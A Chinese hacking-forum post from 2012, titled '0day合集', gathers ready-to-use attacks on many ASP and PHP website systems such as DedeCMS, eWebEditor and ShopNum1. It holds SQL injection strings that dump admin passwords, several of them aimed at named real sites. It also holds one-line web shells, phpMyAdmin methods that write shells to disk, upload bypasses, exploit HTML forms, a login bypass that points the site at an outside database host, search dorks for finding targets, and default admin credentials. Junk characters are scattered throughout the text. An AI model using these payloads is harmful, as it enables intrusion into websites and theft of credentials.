找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3373|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本
5 T9 _: h7 B  e4 \& f% x: [4 o2 [+ w- G0 ~; O; g
直接上exploit:# C. V, I; R/ d! }7 G( e. Q
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
$ @' H) ~6 b+ V  V6 e+ M6 {test:http://www.tb11.net/system/xitong/shownews.asp?id=210! p9 B' I! w- V  k; r
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 P( K' `8 s9 p7 p5 t  L8 p' @  @Asprain论坛 注册用户 上传图片就可拿到webshell+ d* u+ F3 B* U; {5 s. v# P
" y1 P  ^+ ?2 w- c  C
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
2 T9 h# e; F) {2 v6 a5 a; G1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
. C* U5 H" ]$ S2.gif 为一小图片文件,一定要小,比如qq表情图片2 M3 Q# E/ K0 c; g0 Z
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
+ t; u4 j; }; C+ A! F2 m; y. _, g4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了& r9 F% p9 ]) y' }
5.q.asp;.gif
8 r- q' t+ e& q" [- Y" U1 Kgoogle:Powered by Asprain' a# ^, }  P& T$ d: Q7 ~
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 A& `, L6 W! O/ t2 w; w+ |4 m/ z& [& a4 i8 F) d
ShopNum1全部系统存在上传漏洞。
- T5 U% v6 ]. i! M. c* H7 e' ?) S
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
+ ~# I- h1 z. G+ J按说明 提示登录后台。。/ [5 z* }7 {* a  P0 Y6 r& u
在后台功能页面->附件管理->附件列表
2 p* o& J1 F+ d  v可以直接上传.aspx 后缀木马; Q+ f! Q; @( \, `& G
http://demo.shopnum1.com/upload/20110720083822500.aspx
5 t6 F% @  {2 `( R2 o+ \--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: [, N  e1 `. D% |( m0 p+ l- j: S0 D. _  T9 T) e
牛牛CMS中小企业网站管理系统 上传漏洞
- ?1 L& k! g. l0 {' D( A3 f
/ C# F* A! y1 I4 T2 l8 F' A牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。9 Z5 {0 ?' ]5 a  q4 O; K3 z+ h
后台:admin/login.asp
* y/ t! J. |2 s; {  w+ `% y& Aewebeditor 5.5 Nday
$ C, v8 r( @% `1 g4 b! w/ Qexp:  S" C# N/ R& P" @+ S  J
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?) l2 G' X# a% `& p" l+ F
<input?type=file?name=uploadfile?size=100><br><br>?8 d2 q/ i6 t# ]9 m0 x
<input?type=submit?value=upload>?( ?4 t/ Z8 J8 p/ @( }
</form>
8 A+ q9 ]% X6 M( [ps:先上传小马.
' O# D6 ^4 V2 rinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏  a1 C1 [6 n- }$ u! _) V! [

+ E' s$ i. E8 @7 `) _! K--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( c  D. v3 Q4 w, d

; `- S& _- ^4 q' d% ?: ~YothCMS 遍历目录漏洞. o4 \. v, B! M# N9 `  D5 N
2 n. \3 y* Z. V1 u9 U; [. _9 R
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
% X# n5 t7 }# @+ G- N默认后台:admin/login.asp; o6 R. X0 f. Q* a4 L2 ~# w4 D% ]
遍历目录:' h4 z7 ?/ F2 g4 f4 I* z
ewebeditor/manage/upload.asp?id=1&dir=../
* h- o/ [' s. r* z1 w. l' jdata:: |2 w/ l- h8 o9 F. S/ ]
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa' z1 y' R; x9 K
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 v; i- r2 Y' ~+ ^% U+ p9 z$ W" W

1 m6 c. V, ^2 C/ f8 g4 N+ FNet112企业建站系统 1.0, \$ [7 g0 H4 ?7 q0 R6 ]4 X1 w

5 z) N4 S2 g9 a; y0 t0 M* z源码简介:
& _  k9 l: w5 R6 `" ?2 ONet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
. b1 K* i, i7 u( {* y7 j添加管理员:. r; H" S7 v' J  f8 h: K7 i5 }
http://www.0855.tv/admin/admin.asp?action=add&level=2
* d- P' N' O3 `3 m0 O0 s, B其实加不加都不是很重要,后台文件都没怎么作验证。8 Q5 u  ^: O$ X" V9 ^
上传路径:0 _3 A  h5 X9 N0 q" c$ b  |/ \4 U" C
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
6 ?1 ]$ g# B7 w0 ]' U8 e7 c3 R+ yhttp://www.0855.tv/inc/Upfile.asp?Stype=2/ _2 j% `; w0 I
怎么利用自己研究。
% w. H" m, T) @$ o0 A遍历目录:) I, ]4 z$ _, I1 W# b* }
http://www.0855.tv/admin/upfile.asp?path=../..
* m* K+ N4 F& B: z  g如:% v1 r) z. o; r
http://www.0855.tv/admin/upfile.asp?path=../admin5 G6 \4 v+ P7 q  @. j
http://www.0855.tv/admin/upfile.asp?path=../data
+ `5 F$ q- G- f; U; E/ n; R--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 a$ t4 C5 l: r3 O7 p4 {8 s
# d  }$ a* y. G& B- l* A8 @易和阳光购物商城通杀 上传漏洞' r; D) Y9 l" U! F( z

; ~8 J6 G" z4 o前提要求是IIS6.0+asp坏境。, C' |# g( p$ @6 _4 j9 G& D7 C
漏洞文件Iheeo_upfile.asp
8 D) R7 L8 u7 m6 F6 [过滤不严.直接可以iis6.0上传1 i' N& M4 V, l. ]2 l3 D2 a+ u2 U
把ASP木马改成0855.asp;1.gif7 U- N: H4 A* g/ o1 w9 r
直接放到明小子上传
; ~, ?6 n0 z* m1 z' q7 H$ j2 R4 p" wGoogle搜索:inurl:product.asp?Iheeoid=
5 a# Y$ h+ T+ g/ x5 _: C) X--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  |+ U1 G7 D' t% @6 N9 |3 v) U3 C" X1 `7 |8 O: k; Y  `
phpmyadmin后台4种拿shell方法0 v9 \: b6 K2 I$ I9 r( J

* C( M& V- h: t8 a" b: S8 l6 a方法一:2 G) V3 x$ ~+ C% K# t8 ^# ~3 A: A
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
9 U4 a0 p% K- e4 `# y/ h2 @INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
+ {* n( e/ ^3 Q) L' S1 z) [/ KSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';0 e7 a" S! l. G4 v( ?
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
! L* y% o, u! y, G6 F' ?0 W一句话连接密码:xiaoma. L9 d3 Q% D. Z) ~& W" G" o
方法二:
0 [5 q1 U  z. h! d: @0 ], Z5 zCreate TABLE xiaoma (xiaoma1 text NOT NULL);
& w' w; V$ n! @/ b" j7 i; _Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');9 S/ h' t- r! w# J
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
* r/ Y, g& L' M6 V' VDrop TABLE IF EXISTS xiaoma;  U0 [1 N1 a+ q
方法三:' g8 y$ q3 \- |# W% q4 c
读取文件内容:    select load_file('E:/xamp/www/s.php');
$ `6 H2 |8 P$ @* r0 w8 V0 }6 @写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'5 ^: A0 [$ {" M% b
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
. J, J; k: d# v, t. H* F5 X方法四:) {7 P; Y* L1 \: B9 {# c! Q
select load_file('E:/xamp/www/xiaoma.php');$ U( n0 j6 ?5 ]; f, A
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
+ W) h0 }5 T1 O2 D然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
6 o( k& L7 g3 A; G0 ]% Z  r+ d  [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------  u9 |6 V9 g0 a$ z% j( y9 }

- `. o8 q$ J' c1 p4 }1 M& q& M/ ?传信网络独立开发网站源码0day漏洞
" M! W- Q0 b: s0 R8 W& n) k+ b# j0 N8 E) n7 ^6 L8 }- _1 b0 W
后台system/login.asp) Y. n% |* I+ H; l, l( l  ~: i
进了后台有个ewebeditor
. R0 T2 V- u7 O3 \1 x: a/ A& o' fGoogle 搜索inurl:product1.asp?tyc=
. g4 {3 d) Q/ ^  d& e编辑器漏洞默认后台ubbcode/admin_login.asp
% s3 F- r# v! @8 w5 j( D数据库ubbcode/db/ewebeditor.mdb
2 e) z) t1 j- B& Z默认账号密码yzm 111111
$ b4 ?1 x- b8 K7 `& ?" m5 {+ G" y, X& ], H
拿webshell方法; s1 a3 ]% Q4 u
登陆后台点击“样式管理”-选择新增样式 7 i. q( W& `. r9 P
样式名称:scriptkiddies 随便写
8 F, I' x& U, y' Y7 `路径模式:选择绝对路径 , d9 t. _( i9 |! x/ B! K; Y1 m
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx! |/ w- h( Q! j+ x$ p3 w
图片类型比如就是我们要上传的ASP木马格式
( v# P0 L1 r0 N上传路径:/
5 U) I$ ^& _, D! m图片限制:写上1000 免的上不了我们的asp木马; B, e( H% n8 |+ x2 j6 |' k1 [2 m
上传内容不要写
8 ^1 ^) @: q0 I9 w可以提交了
! ^+ m- z+ ^5 g% Q5 ?: B2 ^样式增加成功! : c+ O2 m+ ^, U
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 6 W" g0 g) W9 u& i6 `
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
# a& o! i+ m* I7 s8 y: j网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies5 D& ~, X3 i/ ?, K
上ASP木马 回车 等到路径9 D" ]( r0 g8 f1 f. J$ |, _  X: }. w
1 n  d; P, u0 f  H& x) D& ?6 B1 Q& n
后台:system/login.asp3 h. C$ H; a- k1 V( C6 a3 J* O8 R* @7 ^
Exp:( |8 G9 p" m! |" c$ ~6 }% T4 Z, z
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
! x- @. L0 y- ?1 \. L8 `测试:
. [1 |( N. d& {http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
8 \7 Y" A8 q* J0 A( i0 e8 c+ ?http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master- b) S0 o" R) z5 A9 t" y* ^8 R( z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------; n4 X5 P. ^3 |0 M4 [# K! V) N

( e! v6 I6 q. d: [* Dfoosun 0day 最新注入漏洞
1 B0 ?1 [2 S# T$ `
* I; t( H: z7 E/ w5 `" h漏洞文件:www.xxx.com/user/SetNextOptions.asp
6 K) z( m2 {7 k6 q利用简单的方法:
: I& `& E0 G# Q* m, w4 I5 Q3 G暴管理员帐号:  d0 A& L% ]/ V. \8 H2 U9 R+ G( G
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
. ]! Y" O9 u! z# i* D暴管理员密码:5 T& q$ Y6 ~1 N# d* G! X
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,' ?( c- P1 Z0 e4 G% x" x
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' K5 C" O0 Y1 c9 X1 u$ k
3 K5 ?& }) L0 w) q7 b" x
网站程序的版权未知!* B8 U6 b& \" e- ^6 M9 e4 @. ^
# l% g+ B: z# y. L8 N/ [' S. N
默认网站数据库:
3 V; f9 p; p6 t! {' b9 C) o& Bwww.i0day.com/data/nxnews.mdb
4 U/ P/ I: x, P8 k& Hewebeditor 在线编辑器:' N1 c! M' s1 g9 Q" T9 U( C6 @
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb7 U3 ]! Z, a5 Z. \  D
登录地址:ewebeditor/admin_login.asp
3 d8 X3 z  o6 \默认密码:admin  admin5 k( t% i& @  p/ o1 _. `0 l8 x
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data  ?, |$ q1 f  h; A) Q

6 `) ^4 o2 W; B, i' n8 C0 gSql注入漏洞:
3 @6 }& q' Z. m1 U2 Y3 j3 mhttp://www.i0day.com/detail.asp?id=12
+ Z9 J7 O9 W* Z  dexp:
+ y( v+ J  m$ Z( k+ x; F/ ]union select 1,admin,password,4,5,6,7,8 from admin; e6 ]- x; I! [5 I! a! z
爆出明文帐号/密码
3 A* V5 c- N* v4 Z. [3 v+ a* O7 p& Q" h
上传漏洞:( P/ Y/ T' G3 F% g3 `
后台+upfile.asp* q& C3 Y) K& g; N$ J
如:, b; h2 ~' H. U
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。" X  w, [" |0 r) p0 m
shell的地址:网址+后台+成功上传的马$ l  T& e5 A4 b: ]
google:inurl:news.asp?lanmuName=
0 ~2 u' c5 |3 X/ r------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 }) N9 i) C+ {0 @( H1 b
  D' P0 \$ Z2 E6 o3 O
dedecms最新0day利用不进后台直接拿WEBSHELL
, o, n9 ?; y( o0 y/ K& m  K8 I8 ]& s% z  R0 j- K' r
拿webshell的方法如下:
9 s5 A3 D. S2 ]) i! q3 Y5 Y网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
9 d  n+ B- y" C1 e- l* q% |/ P  g前题条件,必须准备好自己的dede数据库,然后插入数据:0 @5 p8 c) U4 x: s, t9 n+ N
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); : s8 T/ Q# @% D8 R' [8 m, R

0 [" Z+ l7 z6 r* B8 d6 T1 b再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
% \' ^0 f2 A1 f  ~4 ?+ Y<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
7 \8 Q" i4 M/ |- e9 |4 d3 W<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />. K9 C* s1 d1 x
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />5 I' k3 E3 M" ^- {* o  u. U& x5 ~
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />, k8 V. d% q9 k# y- R( g: y. A3 k
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
$ K$ W7 b# ~' I" C<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />- i! n+ k# {3 g9 W0 ~
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
8 p8 y& t  W% X  ?# q7 y<input type="text" value="true" name="nocache" style="width:400">
& e1 }5 e) t% M, m<input type="submit" value="提交" name="QuickSearchBtn"><br />
9 `+ B; j& X* v! l</form>
! l  o: H0 j& v) z<script>2 D; `/ I5 _' x4 P3 ?! }! ^
function addaction()
+ \/ m2 A6 p* Y- @{) Q) }8 R: N, D) u- X, D8 [  X0 S
document.QuickSearch.action=document.QuickSearch.doaction.value;2 s1 |" P8 |/ K, o, N7 q5 a, C
}
! Y& K* g. _# z1 ~, i9 ]</script>: W/ j6 g# k7 T8 ?% g$ Z8 a# E
-----------------------------------------------------------------------------------------------------------------------------------------------5 i( W& c* M6 [! ]4 k% U
! v6 S  _9 B) j7 o4 n6 h/ X2 B
dedecms织梦暴最新严重0day漏洞
& k2 a+ B( h, B5 M" P. R- `bug被利用步骤如下:3 u6 X  I3 L- _' q: g+ [3 V
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root8 F2 s$ H9 A! X- ], c7 [
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。9 r5 M! u. A+ B; X  |
-------------------------------------------------------------------------------------------------------------------------------------------3 N% q4 a: n! T, z! q1 _( m5 t8 U
7 N4 {. w- V* j* r; u" F
多多淘宝客程序上传漏洞
1 C' E1 N. D3 h7 \漏洞页面:: x4 P% D- f, p
admin\upload_pic.php( y3 o* V# ^; o. }3 T6 r% T
传送门:
* \, _3 ]: J- \1 E: Dhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1* m5 \. J0 C) y" e1 ?
PS:copy张图片马 直接  xxx.php 上传抓包地址!1 r+ K: }/ U7 j6 `9 ~' W& f
------------------------------------------------------------------------------------------------------------------------------------------------------) }  z2 F7 ~2 v- q+ H. L+ l: C) R4 J
6 a+ `: S7 {. B5 B
无忧公司系统ASP专业版后台上传漏洞
2 ^8 a/ K& f# ?- t漏洞文件 后台上传6 m! ?/ V# D) N7 P' w, V
admin/uploadPic.asp
& D8 L3 W1 L+ j& a) O) S' ?漏洞利用 这个漏洞好像是雷池的
+ ?+ ^/ t8 i" \. x  ~http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
, q" d; P) Z7 _6 e* A1 Z: z! D等到的webshell路径:$ G, b4 u- }* J3 V# |3 ?
/UploadFiles/scriptkiddies.asp;_2.gif' z- z. n$ Y% [4 N# |: \
---------------------------------------------------------------------------------------------------------------------------------------------------
7 I% K, z7 u5 m: V4 ~9 g6 C; g- M1 P6 B3 h" B! d& l
住哪酒店分销联盟系统2010
! `$ v% Q1 `" o4 \, ]Search:
! c  \( v, [# N8 R' z) |inurl:index.php?m=hotelinfo
6 w8 B+ G' I, y+ i0 w% G! }6 Hhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
0 V1 ^" h2 k7 ]3 [, D1 x默认后台:index.php?m=admin/login
( B1 r. i4 l: E5 g" D- G3 A--------------------------------------------------------------------------------------------------------------------------------------------------+ ~: {. J; Q5 r& i% z# u( d
4 ~- [8 X6 D  Y5 w+ p# [* F9 |+ B( X
inurl:info_Print.asp?ArticleID=- `6 k  T# _: t% x  }1 o' d
后台 ad_login.asp  M8 ]' b8 y0 X
爆管理员密码:/ G* {2 L' J- ?$ n
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin+ |4 u8 y, Q7 @5 ~5 e
------------------------------------------------------------------------------------------------------------------------------------------------------------3 E( K' _4 a# c" s2 X/ j

  E/ q/ y3 [% t: V8 Z搜索框漏洞!( p; E9 E$ {1 Y$ j- O. s
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
  r. N0 }4 n& r5 g--------------------------------------------------------------------------------------------------------------------------------------------------------
1 E& R, L# I) K7 V3 N) D- J5 A2 {4 j9 ?4 @' q
关键字:
2 G& G5 g) s) k- Binurl:/reg_TemletSel.asp?step=2) O; r$ N. g) W; [( |
或者
% E, H' R) {+ _: [+ }( H5 O电子商务自助建站--您理想的助手* U& q5 i9 j# [% F4 m
-------------------------------------------------------------------------------------------------------------------------------------------------
, V$ D! ]9 E5 F0 Q2 K: ~  T% C4 G5 B, L- N* d  P# h% ]
iGiveTest 2.1.0注入漏洞
, [( i$ v, o; b+ uVersion: <= 2.1.0
- M7 Y2 K8 u2 y$ `8 h# Homepage: http://iGiveTest.com/: J% T; Z- M# m4 ]2 E9 O& G
谷歌关键字: “Powered by iGiveTest”3 E) D7 r2 W$ d6 Y4 P# F/ }1 c
随便注册一个帐号。然后暴管理员帐号和密码# U2 \$ ~: Z7 v0 A* ^
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
  }; L# V+ q! r& f. a" I------------------------------------------------------------------------------------------------------------------------------------------------9 J0 ~  R2 n6 a) H/ ?7 t+ ?

/ v; F) R2 c* {) y6 @CKXP网上书店注入漏洞
) N; X8 k) R7 J4 g* f/ c) h5 f" M工具加表:shop_admin 加字段:admin
. j5 u) \* Y4 g+ t后台:admin/login.asp - I5 l: ?4 l9 Y$ f
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/" k# \' e8 m4 Z# n5 |; g
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息; I! b9 f6 r3 F8 W9 u* g6 W
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ v0 |, k4 W' _; \/ X# P% h! O8 \2 z( h' n3 h2 K; |: O
段富超个人网站系统留言本写马漏洞5 p' C$ v" S# }
源码下载:http://www.mycodes.net/24/2149.htm2 ]% I3 R, M# W8 i) N( N* d; \
addgbook.asp 提交一句话。
2 o" N! {/ i" V0 `( h" W连接: http://www.xxxx.tv/date/date3f.asp
; C; ?. Q# C# J2 r/ ?6 Ugoogle:为防批量,特略!) t6 _3 g& l  [
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 Z7 r% t0 M* }# x! e( @. G5 u! G# L* i- E+ l0 F# j6 Y" B  {
智有道专业旅游系统v1.0 注入及列目录漏洞
  g, H$ Y: e9 R2 h3 r" @$ f默认后台路径:/admin/login.asp
2 c: ?/ d- D) b) s0 c默认管理员:admin
1 E2 t& {. f; c- h+ X/ a默认密码:123456
( ]/ E  a9 f/ Q* k& \4 j+ XSQL EXP Tset:
. D1 `+ ?& W3 P# s7 f+ D2 @( H; y5 @http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
5 D1 }" N. f& S, V------------------------------------------------------------------------------------------------------------------------------------------------------------------------* E) M5 C" S' y0 D# h- I

" o! H, T8 p4 \; F- iewebeditor(PHP) Ver 3.8 本任意文件上传0day, N5 P6 N8 Q% t
EXP:# V# Z3 _. b# C5 r: l
<title>eWebeditoR3.8 for php任意文件上EXP</title>
7 K% Q8 _0 f7 j$ e<form action="" method=post enctype="multip
, t: ~! J2 S% Q0 N& bart/form-data">
3 k! U6 ]& t/ P1 o3 \6 o# D/ `<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 9 a( q, \4 r$ E
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
8 E/ f. J+ L3 x<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
$ E" r7 g6 d& b, @' Q5 Ffile:<input type=file name="uploadfile"><br> 6 O& Q- H, u9 O9 |5 V, V
<input type=button value=submit onclick=fsubmit()> 3 _( u' w9 i' [  C- K' h5 V
</form><br> 8 r( f3 m; M# R- J- n5 K  C
<script>
) V" V) [  N6 tfunction fsubmit(){ 0 f8 C; C" R' H- |; r2 ]& E0 H3 }
form = document.forms[0]; 5 I) @. l+ B! X& b$ c" X1 Z2 O
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
4 u# N. P  F8 [3 V% Zalert(form.action); % H8 K7 Q5 v3 N( Q
form.submit(); % _% f- G* G" z% w% v/ |
}
% J. O; k! G( Q0 n5 M</script>8 |% s( H* x$ D
注意修改里面ewebeditor的名称还有路径。! X& u  O4 y8 c5 r& F
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 \% t- x* O3 v8 P  j
2 A' Z$ S, T. O0 d/ y提交’时提示ip被记录 防注入系统的利用  a8 {, x) v; n" D1 c4 y; \
网址:http://www.xxx.com/newslist.asp?id=122′
8 V, d* }; M" ^! d' V提示“你的操作已被记录!”等信息。
( J" u+ N8 H; x# k! ~利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
3 v! k& V/ B4 f-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------" h" j# q9 R7 p: a- |

  U: p* g, C, m- X# U5 G% F, s西部商务网站管理系统 批量拿shell-0day5 |) v0 m9 x9 s8 L0 j
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
! [- T% N% ]; R1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
+ j* o2 }) @7 E' A" O; [2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合$ o8 z! f0 B2 s
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
- h  \3 ]5 ^: Y2 R! f! f- l---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 a, E; m8 n. D) P* S
. q  M) c6 V  R- H, H% WJspRun!6.0 论坛管理后台注入漏洞  X' s" {! M! C, c9 @7 k

+ s! Q8 W: z$ a: T# G% k" x& QSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
  Z5 S7 t6 O0 n- Q; JJspRun!6.0
4 i- O3 X8 M: b. ]) F" d6 X漏洞描述:
, K2 y* A' n; I+ S5 G* ^JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。& i* `: F6 K7 E7 N1 [) l
在处理后台提交的文件中ForumManageAction.java第1940行
3 g' a; n  K4 L* M' m, \! }String export = request.getParameter("export");//直接获取,没有安全过滤3 C0 }3 ?. f& ~; ~
if(export!=null){
% I8 A; g5 t4 l( u+ jList&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...- D4 W! l, H( L( D. h
if(styles==null||styles.size()==0){4 P- e6 @2 H& Z- |3 U- Y# [
<*参考  w5 L! S9 G; K. I4 M( m/ `* V
nuanfan@gmail.com6 }5 C. U$ _" Z2 T5 ]. a. P6 Y
*> SEBUG安全建议:
* n3 {, H5 X/ C" k; t. u& Vwww.jsprun.net, ?: b, j4 m# t
(1)安全过滤变量export
, t: r; a  W: q(2)在查询语句中使用占位符2 D2 `1 T( U2 m: L
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ K6 m$ ~/ l- G( B$ x' ]% F, K2 }
乌邦图企业网站系统 cookies 注入
1 d# H5 b: y. `- P* a$ u$ Z% _# j5 O+ i0 G  n. q$ ]' d' k
程序完整登陆后台:/admin/login.asp
% d3 ?; P* N2 K! _- g4 u+ d默认登陆帐号:admin 密码:admin8885 Z6 w, ^- d' U% M( x
语句:(前面加个空格)
7 Y" o  i0 M4 m/ K0 [3 Dand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin6 y& [3 m6 k" K/ f9 ~( r  t6 t" D
或者是16个字段:; Q$ [1 c: r" ]* N8 r
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin) @; j- [2 u! |/ ^/ F
爆不出来自己猜字段。: L9 [! R' c8 P( a3 K0 q+ `% b) R& L
注入点:http://www.untnt.com/shownews.asp?=889 h* F0 `4 u* J
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
" G" ^7 k, h+ S/ M" a6 G7 L6 s( A( \关键字:/ g$ k+ L% Q3 G/ @- G" u
inurl:shownews?asp.id=
2 l: P( M* `- ~" T- s$ t" c-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 p  f7 W2 f7 }* X

+ i4 {/ v2 X7 ^0 WCKXP网上书店注入漏洞7 A9 t; l  q% ^7 q) U
- ]5 B7 ?0 T2 ?+ E- y- D! ~4 @3 L
工具加表:shop_admin 加字段:admin
" D, i1 o( `& _后台:admin/login.asp
